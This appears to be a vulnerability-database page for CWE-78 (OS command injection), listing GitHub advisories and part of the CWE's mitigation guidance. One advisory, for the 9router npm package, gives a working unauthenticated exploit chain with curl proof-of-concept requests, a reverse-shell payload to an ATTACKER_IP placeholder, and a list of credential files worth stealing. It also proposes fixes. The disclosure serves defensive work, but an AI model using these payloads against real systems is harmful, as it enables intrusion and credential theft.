CWE-78
AllowedImproper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Abstraction: Base · Status: Stable
The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.
8272 vulnerabilities reference this CWE, most recent first.
GHSA-FH9M-3RMH-FFG9
Vulnerability from github – Published: 2026-01-23 21:30 – Updated: 2026-01-26 18:31An OS command injection vulnerability in the com.sprd.engineermode component in Doogee Note59, Note59 Pro, and Note59 Pro+ allows a local attacker to execute arbitrary code and escalate privileges via the EngineerMode ADB shell, due to incomplete patching of CVE-2025-31710
{
"affected": [],
"aliases": [
"CVE-2025-67264"
],
"database_specific": {
"cwe_ids": [
"CWE-78"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-01-23T20:15:53Z",
"severity": "HIGH"
},
"details": "An OS command injection vulnerability in the com.sprd.engineermode component in Doogee Note59, Note59 Pro, and Note59 Pro+ allows a local attacker to execute arbitrary code and escalate privileges via the EngineerMode ADB shell, due to incomplete patching of CVE-2025-31710",
"id": "GHSA-fh9m-3rmh-ffg9",
"modified": "2026-01-26T18:31:28Z",
"published": "2026-01-23T21:30:43Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67264"
},
{
"type": "WEB",
"url": "https://github.com/Skorpion96/unisoc-su/blob/main/CVE-2025-67264.md"
},
{
"type": "WEB",
"url": "http://doogee.com"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-FHH6-4QXV-RPQJ
Vulnerability from github – Published: 2026-05-19 19:22 – Updated: 2026-05-19 19:22Summary
9router exposes two unauthenticated API endpoints that, when chained together, allow any network-adjacent attacker to execute arbitrary OS commands as the user running the 9router process — with zero prerequisites and no credentials required.
The vulnerability exists because the Next.js middleware that enforces authentication (src/proxy.js) only guards 8 explicitly listed routes. The attack surface of /api/cli-tools/* and /api/mcp/* (40+ routes) receives no authentication whatsoever.
Root Cause
1. Middleware Allowlist Is Too Narrow
File: src/proxy.js
export const config = {
matcher: [
"/",
"/dashboard/:path*",
"/api/shutdown",
"/api/settings/:path*",
"/api/keys",
"/api/keys/:path*",
"/api/providers/client",
"/api/provider-nodes/validate",
],
};
Next.js middleware only runs on routes matching this list. Routes NOT listed — including /api/cli-tools/* and /api/mcp/* — bypass the dashboardGuard auth check entirely.
2. Unguarded Endpoint Accepts Arbitrary Command Registration
File: src/app/api/cli-tools/cowork-settings/route.js, lines 292–319
export async function POST(request) {
const { baseUrl, apiKey, models, plugins, localPlugins, customPlugins } = await request.json();
// ...
const customPluginsArray = Array.isArray(customPlugins) ? customPlugins : [];
if (customPluginsArray.length > 0) {
const { registerCustomPlugin } = require("@/lib/mcp/stdioSseBridge");
const stdioCustoms = customPluginsArray
.filter((p) => p.command)
.map((p) => ({
name: p.name,
command: p.command, // ← attacker-controlled, no validation
args: p.args || [], // ← attacker-controlled, no validation
}));
for (const p of stdioCustoms) registerCustomPlugin(p); // stores in globalThis
}
}
The command and args fields from the attacker's JSON are stored verbatim into globalThis.__9routerCustomPlugins — a process-global Map that survives Hot Module Replacement.
File: src/lib/mcp/stdioSseBridge.js, lines 114–116
function registerCustomPlugin(def) {
getCustomStore().set(def.name, def); // no validation of command/args
}
3. Unguarded SSE Endpoint Triggers spawn() with Stored Command
File: src/app/api/mcp/[plugin]/sse/route.js, lines 6–25
export async function GET(request, { params }) {
const { plugin } = await params;
if (!findPlugin(plugin)) return new Response(`Unknown plugin: ${plugin}`, { status: 404 });
const stream = new ReadableStream({
start(controller) {
sid = registerSession(plugin, send); // ← spawn() called here
},
});
return new Response(stream, { ... });
}
File: src/lib/mcp/stdioSseBridge.js, line 138
const proc = spawn(plugin.command, plugin.args, {
stdio: ["pipe", "pipe", "pipe"],
env: process.env, // inherits full environment
});
spawn() is called with shell: false (default), but since the attacker controls both plugin.command (the binary path) and plugin.args, this is equivalent to arbitrary command execution.
Attack Chain
Attacker (no credentials)
│
│ Step 1 — Register malicious plugin (POST, no auth)
▼
POST /api/cli-tools/cowork-settings
Content-Type: application/json
{
"baseUrl": "x", "apiKey": "x", "models": ["x"],
"customPlugins": [{
"name": "rev",
"command": "/bin/bash",
"args": ["-c", "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"]
}]
}
← {"success":true, ...}
│ Step 2 — Trigger spawn() via SSE endpoint (GET, no auth)
▼
GET /api/mcp/rev/sse
← SSE stream opens → spawn("/bin/bash", ["-c", "bash -i >& /dev/tcp/..."])
← Reverse shell connects to attacker
Time to exploit from first request: < 2 seconds.
Prerequisites: Network access to port 20128 (Docker default: 0.0.0.0:20128).
Proof of Concept
PoC 1 — File Write (no listener required)
# Step 1: Register payload
curl -X POST "http://TARGET:20128/api/cli-tools/cowork-settings" \
-H 'Content-Type: application/json' \
-d '{
"baseUrl":"x","apiKey":"x","models":["x"],
"customPlugins":[{
"name":"rce1",
"command":"/bin/sh",
"args":["-c","{ id; whoami; hostname; uname -a; } > /tmp/pwned.txt"]
}]
}'
# → {"success":true,...}
# Step 2: Trigger
curl -N --max-time 3 "http://TARGET:20128/api/mcp/rce1/sse" >/dev/null 2>&1
# Verify
cat /tmp/pwned.txt
Observed output (on local test instance):
uid=1000(sondt23) gid=1000(sondt23) groups=...,983(docker),984(ollama)
sondt23
VSOC-sondt23-L
Linux VSOC-sondt23-L 6.17.0-23-generic ... x86_64 GNU/Linux
PoC 2 — Automated PoC script
# File write mode (for report)
python3 poc.py --target http://TARGET:20128 --mode file
# Reverse shell mode (interactive)
python3 poc.py --target http://TARGET:20128 --mode shell --lhost ATTACKER_IP --lport 4444
The script (poc.py) is included in this advisory.
Impact
| Category | Detail |
|---|---|
| Confidentiality | Full read access to server filesystem — API keys, TLS private keys, ~/.claude/settings.json (Anthropic tokens), AWS credentials |
| Integrity | Arbitrary file write, persistence via cron/systemd |
| Availability | Process termination, resource exhaustion |
| Lateral movement | docker group membership (confirmed in test) allows full container escape → host root |
| Scope | Remote, unauthenticated, network-accessible |
High-value exfiltration targets on a typical 9router host
~/.claude/settings.json—ANTHROPIC_AUTH_TOKEN~/.aws/credentials,~/.aws/sso/cache/*.json— AWS keys$DATA_DIR/db.sqlite— 9router local database (all stored API keys, provider configs)- TLS private keys managed by the MITM proxy (
src/mitm/)
Affected Versions
| Version | Affected | Notes |
|---|---|---|
| < v0.4.30 | No | cowork-settings and MCP SSE bridge did not exist |
| v0.4.30 | Yes | Introduced in commit 8f4d29c (2026-05-11) |
| v0.4.31 | Yes | |
| v0.4.32 | Yes | |
| v0.4.33 | Yes | Latest at time of disclosure |
The vulnerability was introduced when the MCP stdio→SSE bridge feature was added in v0.4.30. The middleware matcher was not updated to protect the new routes.
Remediation
Fix 1 — Extend middleware matcher (minimal fix)
File: src/proxy.js
export const config = {
matcher: [
"/",
"/dashboard/:path*",
"/api/shutdown",
"/api/settings/:path*",
"/api/keys",
"/api/keys/:path*",
"/api/providers/client",
"/api/provider-nodes/validate",
// ADD these:
"/api/cli-tools/:path*",
"/api/mcp/:path*",
],
};
Fix 2 — Validate command in registerCustomPlugin (defense-in-depth)
File: src/lib/mcp/stdioSseBridge.js
const ALLOWED_MCP_COMMANDS = new Set(["npx", "node", "uvx", "python3", "python"]);
function registerCustomPlugin(def) {
const bin = def.command?.split("/").pop(); // basename only
if (!ALLOWED_MCP_COMMANDS.has(bin)) {
throw new Error(`Blocked: command '${def.command}' not in allowlist`);
}
getCustomStore().set(def.name, def);
}
Fix 3 — Sanitize customPlugins at the API boundary
File: src/app/api/cli-tools/cowork-settings/route.js, line 312
const stdioCustoms = customPluginsArray
.filter((p) => p.command && typeof p.command === "string")
.filter((p) => ALLOWED_COMMANDS.has(path.basename(p.command))) // allowlist check
.map((p) => ({
name: String(p.name).replace(/[^a-zA-Z0-9_-]/g, ""), // sanitize name
command: p.command,
args: (p.args || []).map(String),
}));
All three fixes should be applied together. Fix 1 alone is sufficient to prevent exploitation from unauthenticated attackers, but Fixes 2 and 3 provide defense-in-depth against authenticated users abusing the feature.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "9router"
},
"ranges": [
{
"events": [
{
"introduced": "0.4.30"
},
{
"fixed": "0.4.37"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-46339"
],
"database_specific": {
"cwe_ids": [
"CWE-306",
"CWE-78"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-19T19:22:05Z",
"nvd_published_at": null,
"severity": "CRITICAL"
},
"details": "## Summary\n\n9router exposes two unauthenticated API endpoints that, when chained together, allow any network-adjacent attacker to execute arbitrary OS commands as the user running the 9router process \u2014 with **zero prerequisites** and **no credentials required**.\n\nThe vulnerability exists because the Next.js middleware that enforces authentication (`src/proxy.js`) only guards 8 explicitly listed routes. The attack surface of `/api/cli-tools/*` and `/api/mcp/*` (40+ routes) receives **no authentication whatsoever**.\n\n---\n\n## Root Cause\n\n### 1. Middleware Allowlist Is Too Narrow\n\n**File:** `src/proxy.js`\n\n```js\nexport const config = {\n matcher: [\n \"/\",\n \"/dashboard/:path*\",\n \"/api/shutdown\",\n \"/api/settings/:path*\",\n \"/api/keys\",\n \"/api/keys/:path*\",\n \"/api/providers/client\",\n \"/api/provider-nodes/validate\",\n ],\n};\n```\n\nNext.js middleware only runs on routes matching this list. Routes NOT listed \u2014 including `/api/cli-tools/*` and `/api/mcp/*` \u2014 bypass the `dashboardGuard` auth check entirely.\n\n### 2. Unguarded Endpoint Accepts Arbitrary Command Registration\n\n**File:** `src/app/api/cli-tools/cowork-settings/route.js`, lines 292\u2013319\n\n```js\nexport async function POST(request) {\n const { baseUrl, apiKey, models, plugins, localPlugins, customPlugins } = await request.json();\n // ...\n const customPluginsArray = Array.isArray(customPlugins) ? customPlugins : [];\n\n if (customPluginsArray.length \u003e 0) {\n const { registerCustomPlugin } = require(\"@/lib/mcp/stdioSseBridge\");\n const stdioCustoms = customPluginsArray\n .filter((p) =\u003e p.command)\n .map((p) =\u003e ({\n name: p.name,\n command: p.command, // \u2190 attacker-controlled, no validation\n args: p.args || [], // \u2190 attacker-controlled, no validation\n }));\n for (const p of stdioCustoms) registerCustomPlugin(p); // stores in globalThis\n }\n}\n```\n\nThe `command` and `args` fields from the attacker\u0027s JSON are stored verbatim into `globalThis.__9routerCustomPlugins` \u2014 a process-global Map that survives Hot Module Replacement.\n\n**File:** `src/lib/mcp/stdioSseBridge.js`, lines 114\u2013116\n\n```js\nfunction registerCustomPlugin(def) {\n getCustomStore().set(def.name, def); // no validation of command/args\n}\n```\n\n### 3. Unguarded SSE Endpoint Triggers `spawn()` with Stored Command\n\n**File:** `src/app/api/mcp/[plugin]/sse/route.js`, lines 6\u201325\n\n```js\nexport async function GET(request, { params }) {\n const { plugin } = await params;\n if (!findPlugin(plugin)) return new Response(`Unknown plugin: ${plugin}`, { status: 404 });\n\n const stream = new ReadableStream({\n start(controller) {\n sid = registerSession(plugin, send); // \u2190 spawn() called here\n },\n });\n return new Response(stream, { ... });\n}\n```\n\n**File:** `src/lib/mcp/stdioSseBridge.js`, line 138\n\n```js\nconst proc = spawn(plugin.command, plugin.args, {\n stdio: [\"pipe\", \"pipe\", \"pipe\"],\n env: process.env, // inherits full environment\n});\n```\n\n`spawn()` is called with `shell: false` (default), but since the attacker controls **both** `plugin.command` (the binary path) and `plugin.args`, this is equivalent to arbitrary command execution.\n\n---\n\n## Attack Chain\n\n```\nAttacker (no credentials)\n \u2502\n \u2502 Step 1 \u2014 Register malicious plugin (POST, no auth)\n \u25bc\nPOST /api/cli-tools/cowork-settings\nContent-Type: application/json\n\n{\n \"baseUrl\": \"x\", \"apiKey\": \"x\", \"models\": [\"x\"],\n \"customPlugins\": [{\n \"name\": \"rev\",\n \"command\": \"/bin/bash\",\n \"args\": [\"-c\", \"bash -i \u003e\u0026 /dev/tcp/ATTACKER_IP/4444 0\u003e\u00261\"]\n }]\n}\n\n \u2190 {\"success\":true, ...}\n\n \u2502 Step 2 \u2014 Trigger spawn() via SSE endpoint (GET, no auth)\n \u25bc\nGET /api/mcp/rev/sse\n\n \u2190 SSE stream opens \u2192 spawn(\"/bin/bash\", [\"-c\", \"bash -i \u003e\u0026 /dev/tcp/...\"])\n \u2190 Reverse shell connects to attacker\n```\n\n**Time to exploit from first request:** \u003c 2 seconds. \n**Prerequisites:** Network access to port 20128 (Docker default: `0.0.0.0:20128`).\n\n---\n\n## Proof of Concept\n\n### PoC 1 \u2014 File Write (no listener required)\n\n```bash\n# Step 1: Register payload\ncurl -X POST \"http://TARGET:20128/api/cli-tools/cowork-settings\" \\\n -H \u0027Content-Type: application/json\u0027 \\\n -d \u0027{\n \"baseUrl\":\"x\",\"apiKey\":\"x\",\"models\":[\"x\"],\n \"customPlugins\":[{\n \"name\":\"rce1\",\n \"command\":\"/bin/sh\",\n \"args\":[\"-c\",\"{ id; whoami; hostname; uname -a; } \u003e /tmp/pwned.txt\"]\n }]\n }\u0027\n# \u2192 {\"success\":true,...}\n\n# Step 2: Trigger\ncurl -N --max-time 3 \"http://TARGET:20128/api/mcp/rce1/sse\" \u003e/dev/null 2\u003e\u00261\n\n# Verify\ncat /tmp/pwned.txt\n```\n\n**Observed output (on local test instance):**\n```\nuid=1000(sondt23) gid=1000(sondt23) groups=...,983(docker),984(ollama)\nsondt23\nVSOC-sondt23-L\nLinux VSOC-sondt23-L 6.17.0-23-generic ... x86_64 GNU/Linux\n```\n\n### PoC 2 \u2014 Automated PoC script\n\n```bash\n# File write mode (for report)\npython3 poc.py --target http://TARGET:20128 --mode file\n\n# Reverse shell mode (interactive)\npython3 poc.py --target http://TARGET:20128 --mode shell --lhost ATTACKER_IP --lport 4444\n```\n\nThe script (`poc.py`) is included in this advisory.\n\n---\n\n## Impact\n\n| Category | Detail |\n|---|---|\n| **Confidentiality** | Full read access to server filesystem \u2014 API keys, TLS private keys, `~/.claude/settings.json` (Anthropic tokens), AWS credentials |\n| **Integrity** | Arbitrary file write, persistence via cron/systemd |\n| **Availability** | Process termination, resource exhaustion |\n| **Lateral movement** | `docker` group membership (confirmed in test) allows full container escape \u2192 host root |\n| **Scope** | Remote, unauthenticated, network-accessible |\n\n### High-value exfiltration targets on a typical 9router host\n\n- `~/.claude/settings.json` \u2014 `ANTHROPIC_AUTH_TOKEN`\n- `~/.aws/credentials`, `~/.aws/sso/cache/*.json` \u2014 AWS keys\n- `$DATA_DIR/db.sqlite` \u2014 9router local database (all stored API keys, provider configs)\n- TLS private keys managed by the MITM proxy (`src/mitm/`)\n\n---\n\n## Affected Versions\n\n| Version | Affected | Notes |\n|---|---|---|\n| \u003c v0.4.30 | No | `cowork-settings` and MCP SSE bridge did not exist |\n| v0.4.30 | **Yes** | Introduced in commit `8f4d29c` (2026-05-11) |\n| v0.4.31 | **Yes** | |\n| v0.4.32 | **Yes** | |\n| v0.4.33 | **Yes** | Latest at time of disclosure |\n\nThe vulnerability was introduced when the MCP stdio\u2192SSE bridge feature was added in v0.4.30. The middleware matcher was not updated to protect the new routes.\n\n---\n\n## Remediation\n\n### Fix 1 \u2014 Extend middleware matcher (minimal fix)\n\n**File:** `src/proxy.js`\n\n```js\nexport const config = {\n matcher: [\n \"/\",\n \"/dashboard/:path*\",\n \"/api/shutdown\",\n \"/api/settings/:path*\",\n \"/api/keys\",\n \"/api/keys/:path*\",\n \"/api/providers/client\",\n \"/api/provider-nodes/validate\",\n // ADD these:\n \"/api/cli-tools/:path*\",\n \"/api/mcp/:path*\",\n ],\n};\n```\n\n### Fix 2 \u2014 Validate `command` in `registerCustomPlugin` (defense-in-depth)\n\n**File:** `src/lib/mcp/stdioSseBridge.js`\n\n```js\nconst ALLOWED_MCP_COMMANDS = new Set([\"npx\", \"node\", \"uvx\", \"python3\", \"python\"]);\n\nfunction registerCustomPlugin(def) {\n const bin = def.command?.split(\"/\").pop(); // basename only\n if (!ALLOWED_MCP_COMMANDS.has(bin)) {\n throw new Error(`Blocked: command \u0027${def.command}\u0027 not in allowlist`);\n }\n getCustomStore().set(def.name, def);\n}\n```\n\n### Fix 3 \u2014 Sanitize `customPlugins` at the API boundary\n\n**File:** `src/app/api/cli-tools/cowork-settings/route.js`, line 312\n\n```js\nconst stdioCustoms = customPluginsArray\n .filter((p) =\u003e p.command \u0026\u0026 typeof p.command === \"string\")\n .filter((p) =\u003e ALLOWED_COMMANDS.has(path.basename(p.command))) // allowlist check\n .map((p) =\u003e ({\n name: String(p.name).replace(/[^a-zA-Z0-9_-]/g, \"\"), // sanitize name\n command: p.command,\n args: (p.args || []).map(String),\n }));\n```\n\n**All three fixes should be applied together.** Fix 1 alone is sufficient to prevent exploitation from unauthenticated attackers, but Fixes 2 and 3 provide defense-in-depth against authenticated users abusing the feature.\n\n---",
"id": "GHSA-fhh6-4qxv-rpqj",
"modified": "2026-05-19T19:22:05Z",
"published": "2026-05-19T19:22:05Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/decolua/9router/security/advisories/GHSA-fhh6-4qxv-rpqj"
},
{
"type": "PACKAGE",
"url": "https://github.com/decolua/9router"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "9router: Unauthenticated Remote Code Execution via unprotected MCP custom plugin routes"
}
GHSA-FHHG-7G5H-6C5C
Vulnerability from github – Published: 2022-05-24 17:49 – Updated: 2022-05-24 17:49A remote arbitrary command execution vulnerability was discovered in Aruba ClearPass Policy Manager version(s) prior to 6.9.5, 6.8.9, 6.7.14-HF1. Aruba has released patches for Aruba ClearPass Policy Manager that address this security vulnerability.
{
"affected": [],
"aliases": [
"CVE-2021-29147"
],
"database_specific": {
"cwe_ids": [
"CWE-78"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-04-29T12:15:00Z",
"severity": "HIGH"
},
"details": "A remote arbitrary command execution vulnerability was discovered in Aruba ClearPass Policy Manager version(s) prior to 6.9.5, 6.8.9, 6.7.14-HF1. Aruba has released patches for Aruba ClearPass Policy Manager that address this security vulnerability.",
"id": "GHSA-fhhg-7g5h-6c5c",
"modified": "2022-05-24T17:49:06Z",
"published": "2022-05-24T17:49:06Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-29147"
},
{
"type": "WEB",
"url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-009.txt"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-FHM6-4VJW-5XGX
Vulnerability from github – Published: 2021-12-09 00:01 – Updated: 2021-12-11 00:01A post-authentication remote command injection vulnerability in SonicWall SMA100 allows a remote authenticated attacker to execute OS system commands in the appliance. This vulnerability affected SMA 200, 210, 400, 410 and 500v appliances.
{
"affected": [],
"aliases": [
"CVE-2021-20044"
],
"database_specific": {
"cwe_ids": [
"CWE-78"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-12-08T10:15:00Z",
"severity": "HIGH"
},
"details": "A post-authentication remote command injection vulnerability in SonicWall SMA100 allows a remote authenticated attacker to execute OS system commands in the appliance. This vulnerability affected SMA 200, 210, 400, 410 and 500v appliances.",
"id": "GHSA-fhm6-4vjw-5xgx",
"modified": "2021-12-11T00:01:14Z",
"published": "2021-12-09T00:01:11Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-20044"
},
{
"type": "WEB",
"url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0026"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-FHM6-VP9J-33F9
Vulnerability from github – Published: 2023-07-03 09:30 – Updated: 2024-04-04 05:20A vulnerability arises out of a failure to comprehensively sanitize the processing of a zip file(s). Incomplete neutralization of external commands used to control the process execution of the .zip application allows an authorized user to obtain control of the .zip application to execute arbitrary commands or obtain elevation of system privileges.
{
"affected": [],
"aliases": [
"CVE-2023-3314"
],
"database_specific": {
"cwe_ids": [
"CWE-78"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-07-03T09:15:09Z",
"severity": "HIGH"
},
"details": "\nA vulnerability arises out of a failure to comprehensively sanitize the processing of a zip file(s). Incomplete neutralization of external commands used to control the process execution of the .zip application allows an authorized user to obtain control of the .zip application to execute arbitrary commands or obtain elevation of system privileges.\n\n",
"id": "GHSA-fhm6-vp9j-33f9",
"modified": "2024-04-04T05:20:33Z",
"published": "2023-07-03T09:30:19Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-3314"
},
{
"type": "WEB",
"url": "https://kcm.trellix.com/corporate/index?page=content\u0026id=SB10403"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-FHQP-FJGF-QF28
Vulnerability from github – Published: 2026-07-09 21:31 – Updated: 2026-07-13 12:34A command injection vulnerability in the management plane of Palo Alto Networks PAN-OS® software enables an authenticated administrator to execute arbitrary OS commands as root.
The security risk posed by this issue is significantly minimized when CLI access is restricted to a limited group of administrators.
This issue is applicable to PAN-OS software on PA-Series and VM-Series firewalls and on Panorama (virtual and M-Series).
Cloud NGFW and Prisma Access® are not impacted by this vulnerability.
{
"affected": [],
"aliases": [
"CVE-2026-0286"
],
"database_specific": {
"cwe_ids": [
"CWE-78"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-07-09T19:17:02Z",
"severity": "MODERATE"
},
"details": "A command injection vulnerability in the management plane of Palo Alto Networks PAN-OS\u00ae software enables an authenticated administrator to execute arbitrary OS commands as root.\n\n\n\nThe security risk posed by this issue is significantly minimized when CLI access is restricted to a limited group of administrators.\n\n\n\nThis issue is applicable to PAN-OS software on PA-Series and VM-Series firewalls and on Panorama (virtual and M-Series).\n\n\n\nCloud NGFW and Prisma Access\u00ae are not impacted by this vulnerability.",
"id": "GHSA-fhqp-fjgf-qf28",
"modified": "2026-07-13T12:34:57Z",
"published": "2026-07-09T21:31:20Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0286"
},
{
"type": "WEB",
"url": "https://security.paloaltonetworks.com/CVE-2026-0286"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:N/R:U/V:D/RE:M/U:Amber",
"type": "CVSS_V4"
}
]
}
GHSA-FHRW-GH58-W86X
Vulnerability from github – Published: 2022-05-14 03:44 – Updated: 2022-05-14 03:44iBall iB-WRA150N 1.2.6 build 110401 Rel.47776n devices allow remote authenticated users to execute arbitrary OS commands via shell metacharacters in the ping test arguments on the Diagnostics page.
{
"affected": [],
"aliases": [
"CVE-2018-6388"
],
"database_specific": {
"cwe_ids": [
"CWE-78"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-01-29T18:29:00Z",
"severity": "HIGH"
},
"details": "iBall iB-WRA150N 1.2.6 build 110401 Rel.47776n devices allow remote authenticated users to execute arbitrary OS commands via shell metacharacters in the ping test arguments on the Diagnostics page.",
"id": "GHSA-fhrw-gh58-w86x",
"modified": "2022-05-14T03:44:35Z",
"published": "2022-05-14T03:44:35Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-6388"
},
{
"type": "WEB",
"url": "https://blogs.securiteam.com/index.php/archives/3654"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-FHVV-XJVF-6VWJ
Vulnerability from github – Published: 2023-08-17 03:30 – Updated: 2024-04-04 07:01TN-4900 Series firmware versions v1.2.4 and prior and TN-5900 Series firmware versions v3.3 and prior are vulnerable to the command-injection vulnerability. This vulnerability stems from insufficient input validation in the certificate-generation function, which could potentially allow malicious users to execute remote code on affected devices.
{
"affected": [],
"aliases": [
"CVE-2023-34214"
],
"database_specific": {
"cwe_ids": [
"CWE-77",
"CWE-78"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-08-17T03:15:09Z",
"severity": "CRITICAL"
},
"details": "TN-4900 Series firmware versions v1.2.4 and prior and TN-5900 Series firmware versions v3.3 and prior are vulnerable to the command-injection vulnerability. This vulnerability stems from insufficient input validation in the certificate-generation function, which could potentially allow malicious users to execute remote code on affected devices. ",
"id": "GHSA-fhvv-xjvf-6vwj",
"modified": "2024-04-04T07:01:06Z",
"published": "2023-08-17T03:30:16Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-34214"
},
{
"type": "WEB",
"url": "https://www.moxa.com/en/support/product-support/security-advisory/mpsa-230402-tn-5900-and-tn-4900-series-web-server-multiple-vulnerabilities"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-FJ25-QV33-W7J9
Vulnerability from github – Published: 2025-08-06 03:30 – Updated: 2025-08-06 03:30Kenwood DMX958XR Firmware Update Command Injection Vulnerability. This vulnerability allows physically present attackers to execute arbitrary code on affected installations of Kenwood DMX958XR devices. Authentication is not required to exploit this vulnerability.
The specific flaw exists within the firmware update process. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-26254.
{
"affected": [],
"aliases": [
"CVE-2025-8631"
],
"database_specific": {
"cwe_ids": [
"CWE-78"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-08-06T02:15:50Z",
"severity": "MODERATE"
},
"details": "Kenwood DMX958XR Firmware Update Command Injection Vulnerability. This vulnerability allows physically present attackers to execute arbitrary code on affected installations of Kenwood DMX958XR devices. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the firmware update process. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-26254.",
"id": "GHSA-fj25-qv33-w7j9",
"modified": "2025-08-06T03:30:26Z",
"published": "2025-08-06T03:30:26Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8631"
},
{
"type": "WEB",
"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-779"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-FJ48-9CFM-37X5
Vulnerability from github – Published: 2022-05-14 03:37 – Updated: 2022-05-14 03:37IBM BigFix Platform 9.0, 9.1 before 9.1.8, and 9.2 before 9.2.8 allow remote authenticated users to execute arbitrary commands by leveraging report server access. IBM X-Force ID: 111302.
{
"affected": [],
"aliases": [
"CVE-2016-0291"
],
"database_specific": {
"cwe_ids": [
"CWE-78"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-02-28T17:29:00Z",
"severity": "HIGH"
},
"details": "IBM BigFix Platform 9.0, 9.1 before 9.1.8, and 9.2 before 9.2.8 allow remote authenticated users to execute arbitrary commands by leveraging report server access. IBM X-Force ID: 111302.",
"id": "GHSA-fj48-9cfm-37x5",
"modified": "2022-05-14T03:37:05Z",
"published": "2022-05-14T03:37:05Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2016-0291"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/111302"
},
{
"type": "WEB",
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21985748"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
Mitigation
If at all possible, use library calls rather than external processes to recreate the desired functionality.
Mitigation MIT-22
Strategy: Sandbox or Jail
- Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software.
- OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations.
- This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise.
- Be careful to avoid CWE-243 and other weaknesses related to jails.
Mitigation
Strategy: Attack Surface Reduction
For any data that will be used to generate a command to be executed, keep as much of that data out of external control as possible. For example, in web applications, this may require storing the data locally in the session's state instead of sending it out to the client in a hidden form field.
Mitigation MIT-15
For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.
Mitigation MIT-4.3
Strategy: Libraries or Frameworks
